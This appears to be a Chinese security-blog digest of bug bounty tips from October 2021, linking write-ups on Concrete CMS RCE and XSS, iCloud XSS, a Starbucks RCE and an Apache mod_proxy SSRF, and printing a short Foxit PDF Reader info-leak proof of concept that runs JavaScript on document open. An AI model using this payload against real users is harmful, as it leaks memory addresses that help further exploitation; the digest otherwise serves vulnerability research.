bugbounty技巧聚合20211018

01097

漏洞报告

【Concrete CMS】后台路径穿越导致的RCE(CVE-2021-40097)
https://hackerone.com/reports/1102067

【Concrete CMS】通过CSRF在日历事件中造成存储XSS漏洞(CVE-2021-40108)
https://hackerone.com/reports/1102018

挖洞技巧

1、价值9000刀的icloud XSS漏洞
https://bountyget.medium.com/how-i-got-9000-usd-by-hacking-into-icloud-80ed8816d3b5

2、 价值5600刀的 mobile.starbucks.com.sg RCE漏洞
https://bountyget.medium.com/rce-on-starbucks-singapore-and-more-for-5600-926c930bb61e

3、 意料之外的越权
https://bountyget.medium.com/unexpected-idor-vulnerability-in-redacted-redacted-net-write-up-95fc6f10de6c

4、 Apache <= 2.4.48 – Mod_Proxy SSRF (CVE-2021-40438)
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40438.yaml
https://firzen.de/building-a-poc-for-cve-2021-40438

5、 Foxit PDF Reader 1-day info leak PoC
https://twitter.com/l33d0hyun/status/1448963734949412866
poc.pdf

%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
app.alert(util.printf("Leak : %#lx", app));
)>> trailer <</Root 1 0 R>>

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除

© 版权声明
安全小天地的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 安全小天地拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载! 本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:anquanclub@foxmail.com
THE END
技术教程
喜欢就支持一下吧
点赞7 分享
安全小天地的头像-安全小天地小咖
docker 查看容器的挂载目录操作_docker-安全小天地
docker 查看容器的挂载目录操作_docker
docker 查看容器的挂载目录操作_docker
2022年8月14日 20:20 9106
AWVS 14.6.211220100完美破解破解-解决扫描失败问题-安全小天地
AWVS 14.6.211220100完美破解破解-解决扫描失败问题
AWVS 14.6.211220100完美破解破解-解决扫描失败问题
2022年3月10日 22:52 5818
Docker容器迁移到其他服务器的5种方法详解_docker-安全小天地
Docker容器迁移到其他服务器的5种方法详解_docker
Docker容器迁移到其他服务器的5种方法详解_docker
2022年8月11日 20:19 5487
docker下载镜像太慢的解决方案_docker-安全小天地
docker下载镜像太慢的解决方案_docker
docker下载镜像太慢的解决方案_docker
2022年9月2日 20:40 5052
Windows Server 2016远程桌面服务配置和授权激活(2个用户)_win服务器-安全小天地
Windows Server 2016远程桌面服务配置和授权激活(2个用户)_win服务器
Windows Server 2016远程桌面服务配置和授权激活(2个用户)_win服务器
2022年10月10日 20:14 4665
解决docker 容器设置中文语言包出现的问题_docker-安全小天地
解决docker 容器设置中文语言包出现的问题_docker
解决docker 容器设置中文语言包出现的问题_docker
2022年7月10日 20:55 4536
相关推荐
解决nginx报错: [warn] conflicting server name “localhost“ on 0.0.0.0:80, ignored-安全小天地
解决nginx报错: [warn] conflicting server name “localhost“ on 0.0.0.0:80, ignored
解决nginx报错: [warn] conflicting server name “localhost“ on 0.0.0.0:80, ignored
2022年9月17日 10:55 1.1W+
解决夜神模拟器在win11/win10上无法运行的措施-安全小天地
解决夜神模拟器在win11/win10上无法运行的措施
解决夜神模拟器在win11/win10上无法运行的措施
2022年9月30日 18:00 9577
docker 查看容器的挂载目录操作_docker-安全小天地
docker 查看容器的挂载目录操作_docker
docker 查看容器的挂载目录操作_docker
2022年8月14日 20:20 9106
UltraISO 9.7.0.3476中文完美破解安装版-安全小天地
UltraISO 9.7.0.3476中文完美破解安装版
UltraISO 9.7.0.3476中文完美破解安装版
2022年9月29日 19:02 9102
AWVS 14.6.211220100完美破解破解-解决扫描失败问题-安全小天地
AWVS 14.6.211220100完美破解破解-解决扫描失败问题
AWVS 14.6.211220100完美破解破解-解决扫描失败问题
2022年3月10日 22:52 5818
Docker容器迁移到其他服务器的5种方法详解_docker-安全小天地
Docker容器迁移到其他服务器的5种方法详解_docker
Docker容器迁移到其他服务器的5种方法详解_docker
2022年8月11日 20:19 5487
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

热榜文章
One-Fox工具箱V5魔改版已发布!-安全小天地
427人已阅读
One-Fox工具箱V5魔改版已发布!
TOP1
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞-安全小天地
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
2023年11月1日 19:51385人已阅读
TOP2
在Ubuntu中实现人脸识别登录的完整步骤_Linux-安全小天地
在Ubuntu中实现人脸识别登录的完整步骤_Linux
2023年11月5日 20:1182人已阅读
TOP3
Linux中fuser命令用法详解_Linux-安全小天地
Linux中fuser命令用法详解_Linux
2023年11月4日 21:2179人已阅读
TOP4
Linux系统使用Fuser命令的方法_Linux-安全小天地
Linux系统使用Fuser命令的方法_Linux
2023年11月4日 21:2176人已阅读
TOP5
docker启动Java程序的方法步骤_docker-安全小天地
docker启动Java程序的方法步骤_docker
2023年11月7日 20:0075人已阅读
TOP6
相关推荐

1解决nginx报错: [warn] conflicting server name “localhost“ on 0.0.0.0:80, ignored

2解决夜神模拟器在win11/win10上无法运行的措施

3docker 查看容器的挂载目录操作_docker

4UltraISO 9.7.0.3476中文完美破解安装版

5Goby 2.0.5 Beta红队版 包含1288POC

6BurpSuite2022.12专业破解版下载 增加汉化支持

7AWVS 14.6.211220100完美破解破解-解决扫描失败问题

8Docker容器迁移到其他服务器的5种方法详解_docker

9docker下载镜像太慢的解决方案_docker

安全小天地ip签名档